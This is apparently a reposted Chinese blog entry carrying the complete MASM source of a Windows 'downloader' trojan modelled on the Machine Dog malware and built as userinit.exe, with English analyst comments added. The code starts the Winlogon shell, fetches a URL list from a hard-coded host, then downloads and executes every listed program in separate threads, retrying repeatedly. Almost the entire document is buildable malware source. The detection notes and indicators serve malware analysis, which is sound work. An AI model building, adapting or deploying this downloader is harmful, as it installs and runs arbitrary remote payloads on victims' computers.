
(非原创)整理后的"下载者"病毒的代码

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 仿机器狗的感染文件代码
; by naitm(http://hi.baidu.com/naitm)
;
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .386                                ; 32-bit x86 target (MASM); every local/handle below is a DWORD
        .model flat,stdcall                 ; flat memory model, Win32 stdcall for all invoke calls
        option casemap:none                 ; identifiers are case-sensitive (matches the .inc files)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include        windows.inc
include        user32.inc
includelib    user32.lib
include        kernel32.inc
includelib    kernel32.lib
include        Advapi32.inc
includelib    Advapi32.lib
include        wininet.inc
includelib    wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .data    
;---------------------------------------------------------------------
; Global data. Analyst notes, each grounded in how the code below uses it:
;   nThreadCount      - number of live _DownloadEXERunIt threads; main spins on
;                       it before ExitProcess. Updated with plain inc/dec (not
;                       interlocked) from several threads.
;   szTempPath        - '.' : GetTempFileName is called with this path, so the
;                       temp files land in the process's current directory.
;   szValueName       - 'Shell' : used twice - as the Winlogon value name that
;                       main reads, and as the WinInet user-agent string passed
;                       to InternetOpen (a network-side detection artifact).
;   szUser32Dll / szLoadRemoteFonts - resolved with LoadLibrary/GetProcAddress
;                       and called at startup.
;   szSubKey          - Winlogon key whose 'Shell' value is read (never written)
;                       by main.
;   szUrlList         - hard-coded URL of the download list; this address is an
;                       indicator of compromise for this sample.
;---------------------------------------------------------------------
nThreadCount    dd        0
szTempPath        db     '.',0
szValueName        db        'Shell',0
szUser32Dll        db        'user32.dll',0
szLoadRemoteFonts    db    'LoadRemoteFonts',0
szSubKey            db     'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList         db     'http://10.0.0.90/cert.cer',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;以当前进程的STARTUPINFO启动exe文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;---------------------------------------------------------------------
; _RunIt(lpExePath)
; Starts the program named by the string at @lpExePath, using the
; STARTUPINFO of the current process.
; In:   @lpExePath - pointer to a NUL-terminated string; it is passed as
;                    CreateProcess's lpCommandLine with lpApplicationName
;                    = NULL, so CreateProcess's own search rules resolve it.
; Out:  eax = CreateProcess result on the success path (nonzero);
;       on the failure path eax is the last CloseHandle result.
; Note: the handle cleanup below runs only when CreateProcess returned 0,
;       i.e. when the PROCESS_INFORMATION handles were never filled in;
;       on success hThread/hProcess stay open for the life of this process.
;---------------------------------------------------------------------
_RunIt            proc    @lpExePath

local @stStartupInfo:STARTUPINFO
local    @stProcessInformation:PROCESS_INFORMATION

    invoke    GetStartupInfo,addr @stStartupInfo
    invoke    CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
                NULL,NULL,addr @stStartupInfo,addr @stProcessInformation
                
    .if    eax == 0                     ; CreateProcess failed
        invoke    CloseHandle,@stProcessInformation.hThread
        invoke    CloseHandle,@stProcessInformation.hProcess        
    .endif
    
    ret
    
_RunIt            endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;下载文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;---------------------------------------------------------------------
; _DownloadFile(lpURL, lpSaveFile, Buffer)
; Fetches @lpURL over WinInet and writes the body to the file @lpSaveFile.
; In:   @lpURL      - NUL-terminated URL.
;       @lpSaveFile - NUL-terminated path; opened with OPEN_ALWAYS and
;                     truncated to the downloaded length by SetEndOfFile.
;       @Buffer     - handed to InternetSetOption as lpBuffer for the two
;                     timeout options. Both callers in this file pass the
;                     constant 1388h, so the value itself is used as the
;                     buffer address rather than a pointer to a DWORD -
;                     NOTE(review): looks unintended, confirm before relying
;                     on the timeouts being applied.
; Out:  eax = @nWriteCount = number of InternetReadFile chunks (200h bytes
;             max each) that were written; 0 if nothing was retrieved.
; Observations for detection / triage:
;   - The WinInet user-agent is szValueName, i.e. the literal 'Shell'.
;   - HttpQueryInfo(HTTP_QUERY_STATUS_CODE) is only tested for success;
;     the status value returned in @lpbuffer is never examined, so an
;     error page is saved just like a real payload.
;   - Every handle opened here is closed on the same path before return.
;---------------------------------------------------------------------
_DownloadFile    proc    @lpURL,@lpSaveFile,@Buffer

local @hInternet,@hInternetFile,@hLocalFile,@NumberOfBytesWritten,@nNumberOfBytesToWrite,@nWriteCount
local    @lpbuffer[200h]:BYTE
    
    xor eax,eax
    mov @nWriteCount,eax                ; nothing written yet
    
    invoke    InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
    .if    eax != NULL
        mov    @hInternet, eax
        invoke    InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
        invoke    InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
        invoke    InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
        .if    eax != NULL
            mov    @hInternetFile, eax
            mov    @nNumberOfBytesToWrite, 0
            mov    @NumberOfBytesWritten, 200h      ; reused here as the size of @lpbuffer
            invoke    HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
                        addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
            .if    eax != NULL              ; query succeeded; status value itself is ignored
                invoke    CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
                .if    eax != 0FFFFFFFFh   ; INVALID_HANDLE_VALUE
                    mov    @hLocalFile, eax
                    .while TRUE
                        mov @nNumberOfBytesToWrite,0
                        invoke    InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
                        .break    .if (!eax)                      ; read error
                        .break    .if (@nNumberOfBytesToWrite==0) ; end of body
                        inc    @nWriteCount
                        invoke    WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
                    .endw
                    invoke    SetEndOfFile,@hLocalFile    ; drop any tail left from an older, longer file
                    invoke    CloseHandle,@hLocalFile
                .endif                            
            .endif
            invoke    InternetCloseHandle,@hInternetFile
        .endif
        invoke    InternetCloseHandle,@hInternet
    .endif    
    
    mov    eax,@nWriteCount
        
    ret

_DownloadFile   endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;---------------------------------------------------------------------
; _DownloadEXERunIt(lpURL)  - thread entry (see CreateThread in main)
; Copies the URL into a local buffer, downloads it to a temp file in the
; current directory and runs the file on the first successful download.
; In:   @lpURL - pointer to a NUL-terminated URL. main passes the address
;                of a buffer it zeroes and reuses after a 64h ms Sleep, so
;                the lstrcpy below is racing that reuse; only timing keeps
;                the copy intact. lstrcpy performs no length check against
;                the 100h-byte @szUrl.
; Out:  eax is not meaningful (whatever the last call left).
; Side effects: creates a temp file via GetTempFileName(szTempPath='.'),
;               decrements the global nThreadCount with a plain dec (not
;               interlocked) before returning.
; Retry policy visible below: up to 3Ch (60) attempts, 3E8h (1000) ms apart.
;---------------------------------------------------------------------
_DownloadEXERunIt proc    @lpURL

local    @DownTimes
local    @TempFileName[100h]:BYTE
local    @szUrl[100h]:BYTE

    mov    @DownTimes,3Ch               ; remaining attempts
    invoke    lstrcpy,addr @szUrl,@lpURL
    invoke    RtlZeroMemory,addr @TempFileName,100h
    invoke    GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName
    
    .repeat
        invoke    _DownloadFile,addr @szUrl,addr @TempFileName,1388h
        .if eax != NULL                 ; at least one chunk was written
            invoke    _RunIt,addr @TempFileName
            .break
        .else
            invoke    Sleep,3E8h
            dec    @DownTimes
        .endif
    .until (!@DownTimes)
    
    dec    nThreadCount                 ; tell main this worker is done
    
    ret

_DownloadEXERunIt endp        
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;---------------------------------------------------------------------
; main - program entry (label 'start').
; Sequence as written:
;   1. LoadLibrary(user32.dll) / GetProcAddress(LoadRemoteFonts) / call it.
;      The export is called with no arguments via 'call eax'; this file does
;      not establish what it does (the original author asks the same).
;   2. Read HKLM\...\Winlogon\Shell (read-only) and start that program via
;      _RunIt. Together with the 'userinit.asm' build line in the header
;      this presumably lets the sample stand in for the normal logon chain
;      and still bring up the user's shell - inference, not shown here.
;   3. Spin until InternetGetConnectedState reports a connection.
;   4. Download szUrlList to a temp file in '.', retrying until it succeeds.
;   5. Map the file and split it on CR; every non-empty line is handed to a
;      new _DownloadEXERunIt thread as a URL.
;   6. Spin on nThreadCount, then ExitProcess(0).
; Local reuse worth knowing when reading the code:
;   @nSizeOfPath    - RegQueryValueEx size, then scratch out-param for
;                     InternetGetConnectedState and CreateThread's thread id.
;   @szWinlogonPath - Shell value, then temp-file name, then the per-line
;                     URL buffer shared with every worker thread.
;---------------------------------------------------------------------
start:
main proc

local @hKey,@nSizeOfPath,@hFile,@hObject,@lpBaseAddress
local    @szWinlogonPath[104h]:BYTE

    ; load user32.dll and call its LoadRemoteFonts export
    ; (original author's note: what does this function do?)
    invoke    LoadLibrary,offset szUser32Dll
    .if    eax != NULL
        invoke    GetProcAddress,eax,offset szLoadRemoteFonts
        .if    eax != NULL
            call eax
        .endif
    .endif
    
    ; start the program named in the Winlogon 'Shell' value
    invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
    .if eax == ERROR_SUCCESS
        mov    @nSizeOfPath,104h
        invoke    RtlZeroMemory,addr @szWinlogonPath,104h
        invoke    RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
        invoke    _RunIt,addr @szWinlogonPath
        invoke    RegCloseKey,@hKey        
    .endif
    
    ; wait for network connectivity, retrying without delay
    invoke    Sleep,3E8h
    .while TRUE
        invoke    InternetGetConnectedState,addr @nSizeOfPath,0    ; @nSizeOfPath is only scratch here
        .break    .if eax
    .endw
    
    ; get a temp file name and download the URL list into it
    invoke    RtlZeroMemory,addr @szWinlogonPath,104h
    invoke    GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath    
    invoke    Sleep,3E8h
DownloadList:
    .while TRUE
        invoke    _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
        .break    .if eax                 ; at least one chunk received
    .endw
    
    ; open the list file, sanity-check its size, then start the downloads
    invoke    CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
    .if    eax != INVALID_HANDLE_VALUE
        mov @hFile,eax
        invoke    GetFileSize,@hFile,NULL
        .if    eax >= 0Fh    ; a list smaller than 0Fh bytes is treated as a failed download
            invoke    CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
            .if    eax != NULL
                mov    @hObject,eax
                invoke    MapViewOfFile,eax,FILE_MAP_READ,0,0,0
                .if    eax != NULL
                    mov    @lpBaseAddress,eax
                    mov    esi,eax                  ; esi = read cursor into the mapped list
                    
                BeginDownEXE:    
                    lea    edi,@szWinlogonPath      ; edi = write cursor into the line buffer
                    invoke    RtlZeroMemory,edi,104h
                    
                    ; copy bytes until CR; on CR hand the buffered line to a
                    ; _DownloadEXERunIt thread, then restart with a cleared buffer.
                    ; A lone LF is skipped (the byte after it is loaded instead),
                    ; so CRLF and LFCR line endings both work; a final line with
                    ; no CR is never dispatched because the loop ends on NUL.
                    .repeat
                        lodsb
                        .if    al == 0Ah
                            lodsb
                        .endif    
                        .if    al == 0Dh
                            .if    @szWinlogonPath != 0    ; first byte non-zero: line is not empty
                                inc    nThreadCount
                                invoke    CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
                                invoke    CloseHandle,eax
                                invoke    Sleep,64h       ; give the worker time to copy the URL before the buffer is cleared
                            .endif
                            jmp    BeginDownEXE
                        .endif
                        stosb                               ; no bound against the 104h-byte buffer
                    .until (!al)

                    invoke    UnmapViewOfFile,@lpBaseAddress
                .endif
                invoke    CloseHandle,@hObject
            .endif
        .else
            invoke    CloseHandle,@hFile
            jmp    DownloadList                         ; too small: fetch the list again
        .endif
        invoke    CloseHandle,@hFile
    .else
        jmp    DownloadList    ; could not open it: download again
    .endif

    ; sleep until every worker thread has decremented nThreadCount
    .while    nThreadCount
        invoke    Sleep,64h
    .endw
    
    invoke    ExitProcess,0

main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    end    start

